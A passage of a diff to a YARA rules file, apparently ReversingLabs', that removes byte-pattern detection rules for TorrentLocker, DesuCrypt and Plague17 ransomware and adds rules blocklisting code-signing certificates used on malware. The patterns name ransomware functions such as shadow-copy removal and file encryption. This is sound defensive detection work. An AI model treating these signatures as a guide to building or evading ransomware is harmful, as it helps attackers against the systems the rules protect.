-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B 95 ?? ?? ?? ?? 6A ?? 8D
-            8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 52 51 50 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Primetech Ltd." and pe.signatures [ i ] . serial == "5e:75:e9:97:f3:d7:0b:b8:c1:82:d5:6b:25:b7:d8:36" and 1324252800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Torrentlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TorrentLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64bdb0db-ea0c-5a0d-9d3e-db1df86c132b"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "324b2e2f-bad7-5ac4-864c-044d99fa01dc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.TorrentLocker.yara#L1-L98"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1aa523fa95e142b7e421286d26918e3da4bd3e268fef3f98f00820296291bfc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12684-L12702"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4ac17d0f0e4ef2bb5f6cda8e7cb07a641d49c83465a0a80c46ff6e0e752d1847"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TorrentLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$tlocker_ep = {
-          68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 05 E8 ?? ?? ?? ?? 33 C0 C3
-      }
-		$tlocker_contact_server_1 = {
-          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
-          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
-          8B 4D ?? 8D 55 ?? 52 6A ?? BB ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 2C 01 00 00 8B BE
-          ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? 68
-          ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 8D
-          4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 FF
-          15 ?? ?? ?? ?? 8B 45 ?? 57 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? ??
-          56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? ??
-          ?? 8B 3D ?? ?? ?? ?? 56 FF D7 EB 06 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-          ?? ?? ?? FF 15 ?? ?? ?? ?? 53 8B F0 FF D7 85 F6 74 06 8B 55 ?? 52 FF D7 8B 75 ?? 8B 0D ?? ?? ?? ?? 33 C0 83 7D ?? ?? 56
-          0F 94 C0 6A ?? 51 8B F8 FF 15 ?? ?? ?? ?? 85 FF 75 10 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 9E FE FF FF 5F 5E 5B 8B E5 5D
-          C3
-      }
-		$tlocker_contact_server_2_1 = {
-          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
-          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
-          8B 4D ?? 8D 55 ?? 52 6A ?? BF ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 E5 01 00 00 BF ??
-          ?? ?? ?? 39 3D ?? ?? ?? ?? 74 11 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B
-          9E ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ??
-          68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50
-          8D 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56
-          FF 15 ?? ?? ?? ?? 8B 45 ?? 53 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ??
-          ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ??
-          ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 EB 06 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 57 C7 45 ?? ?? ?? ?? ?? C7 45 ??
-      }
-		$tlocker_contact_server_2_2 = {
-          ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B D8 FF D6 85 DB 74 06 8B 55 ?? 52 FF D6 8B 75 ?? 33 C0 83 7D ?? ?? 0F 94 C0 8B F8 85
-          FF 74 18 8B 0D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB 5E 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 75
-          34 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B D1 41 89 0D ?? ?? ?? ?? 85 D2 7E 71 8B 0D ?? ?? ?? ?? 3B C1 73 08 8B C8 89 0D
-          ?? ?? ?? ?? 2B C1 3D ?? ?? ?? ?? 72 1C A1 ?? ?? ?? ?? 40 83 F8 ?? 7E 05 A1 ?? ?? ?? ?? 8B C8 A3 ?? ?? ?? ?? E8 ?? ?? ??
-          ?? 81 3D ?? ?? ?? ?? ?? ?? ?? ?? 75 0B 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 85
-          FF 75 17 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 E5 FD FF FF A3 ?? ?? ?? ?? EB BF 5F 5E 5B 8B E5 5D C3
-      }
-		$tlocker_get_server_data = {
-          55 8B EC 83 EC ?? 56 57 33 FF 57 57 8D 45 ?? 50 53 33 F6 FF 15 ?? ?? ?? ?? 85 C0 74 77 8D 49 ?? 8B 4D ?? 03 CF 85 F6 75
-          73 33 C0 85 C9 74 0F 8B 15 ?? ?? ?? ?? 51 50 52 FF 15 ?? ?? ?? ?? 33 C9 85 C0 0F 95 C1 8B F0 8B C1 85 C0 74 33 8B 55 ??
-          8D 4D ?? 51 52 8D 04 37 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 1C 8B 45 ?? 85 C0 74 ?? 6A ?? 6A ?? 8D 4D ?? 51 53 03 F8 FF 15
-          ?? ?? ?? ?? 85 C0 75 A0 85 F6 74 10 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 33 C0 5E 8B E5 5D C3
-      }
-		$tlocker_remove_shadow_copies = {
-          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 57 6A ?? 33 FF 57 50 FF 15 ?? ?? ?? ?? 8B D8
-          3B DF 0F 84 DC 00 00 00 56 8D B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-          68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 5E B8 ?? ?? ?? ?? 8B D3 2B D0 0F B7 08 66 89 0C
-          02 83 C0 ?? 66 3B CF 75 F1 6A ?? 8D 95 ?? ?? ?? ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-          51 8D 95 ?? ?? ?? ?? 52 57 68 ?? ?? ?? ?? 57 57 57 53 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 0F FF
-          15 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B F8 83 BD ?? ?? ?? ?? ?? 74 0B 8B B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53
-          6A ?? 50 FF 15 ?? ?? ?? ?? 5E 8B C7 5F 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 CD B8 ?? ?? ?? ?? 5B
-          E8 ?? ?? ?? ?? 8B E5 5D C3
-      }
-		$tlocker_find_files = {
-          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 0D ?? ?? ?? ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 F6 56 51
-          89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 AD 01 00 00 53 56 56 6A ?? 56 FF 15 ?? ?? ?? ??
-          85 C0 0F 88 89 01 00 00 68 ?? ?? ?? ?? 53 53 FF 15 ?? ?? ?? ?? 8B C3 8D 50 ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85
-          C9 75 F5 2B C2 D1 F8 8B F8 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 4D 01 00 00 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ??
-          ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 15 01 00 00 F6 85 ?? ?? ?? ?? ?? 0F 84 EC 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-          66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0
-          83 D8 ?? 85 C0 0F 84 AE 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66
-          3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 74 74 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF
-          66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 03 C7 8D 44 00 ?? 85 C0 74 6C 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
-          8B F0 85 F6 74 57 53 8D 4F ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 56 56 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ??
-          ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF
-          15 ?? ?? ?? ?? 85 C0 0F 85 EB FE FF FF 8B 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
-          ?? 8B 15 ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-      }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $tlocker_ep and $tlocker_get_server_data and $tlocker_remove_shadow_copies and $tlocker_find_files ) and ( $tlocker_contact_server_1 or ( $tlocker_contact_server_2_1 and $tlocker_contact_server_2_2 ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET SERVICES d.o.o." and ( pe.signatures [ i ] . serial == "00:d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" or pe.signatures [ i ] . serial == "d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" ) and 1576195200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Desucrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DesuCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b9b3ce2b-f184-5bfa-8e1c-a7b996ac708a"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "dfe87130-7b2f-5f8a-8c2d-8653c2bd0cd3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DesuCrypt.yara#L1-L93"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bd3ba8ea0fc16aad859a73628d0eda180d49298162fe239acf81c7c4e371eaad"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12704-L12722"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f700b4f7cdfda9f678c3a5259d4293640c50567ec277c5b3db69756534e2007f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DesuCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
-            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
-            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
-            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
-            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
-            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encrypt_files = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 8B D9 89 54 24 ?? B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? BE ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? F3 A5 6A ?? 6A ?? 8D
-            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 66 A5 50 6A ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B
-            E5 5D C3 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? 8D 84 24 ??
-            ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F
-            5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 8D 44 24 ?? 50 FF 74 24
-            ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 43 ?? 8B 3D ?? ?? ?? ?? 50 89 44 24 ?? 89 44 24 ?? 8D 44 24 ??
-            50 6A ?? 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 51 BA
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 7B ?? ?? 72 ?? 8B 1B FF 74 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? FF
-            74 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 4C 24
-            ?? 8B 44 24 ?? 5F 89 01 8B C6 8B 8C 24 ?? ?? ?? ?? 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$enum_shares = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 75 ?? 8B 45 ?? 8D 4D ?? 51 50
-            6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ??
-            ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            0F 1F 40 ?? 33 DB 39 5D ?? 0F 8E ?? ?? ?? ?? 83 C7 ?? 66 90 F7 47 ?? ?? ?? ?? ?? 74
-            ?? 8D 47 ?? 89 45 ?? 8B 06 8B 48 ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D 55 ?? 52 FF 50
-            ?? E9 ?? ?? ?? ?? 8B 17 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 70 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C6 D1 F8 83 F8 ?? 77 ?? 8D 34 00
-            89 45 ?? 56 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 44 35 ?? EB ?? 52 C6
-            45 ?? ?? 8D 4D ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ??
-            50 8B 4E ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 83 C7 ??
-            3B 5D ?? 0F 8C ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 57 8D 45 ?? C7
-            45 ?? ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 FF 15 ??
-            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
-            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files and $encrypt_files and $enum_shares )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Virikton" and ( pe.signatures [ i ] . serial == "00:82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" or pe.signatures [ i ] . serial == "82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" ) and 1463616000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Plague17 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Plague17 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "065c47b5-f459-529e-8046-7394a742b50a"
-		date = "2021-02-19"
-		modified = "2021-02-19"
+		id = "72745795-0261-5b7b-b25e-8220bced90ec"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Plague17.yara#L1-L263"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e0e518fc83a62d70b83df273c6ba469e6f0fdf9c035126428ec7561e04437b6f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12724-L12742"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7bbcdb989d53bafbb2bdb694be72d4f7305323c01e8f1eafcb7cd889df165ff6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Plague17"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 89 E5 57 56 8D 85 ?? ?? ?? ?? 53 81 EC ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 31 C0 66 89
-            85 ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 50 ?? 8B
-            00 66 83 7C 50 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ??
-            ?? 2B 51 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 4D ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 8B 7D ?? 83 EC ?? 8B 00 8B 57 ?? 8D 8D ?? ?? ?? ?? 8D 14 50 C6 44
-            24 ?? ?? 89 04 24 89 8D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 83
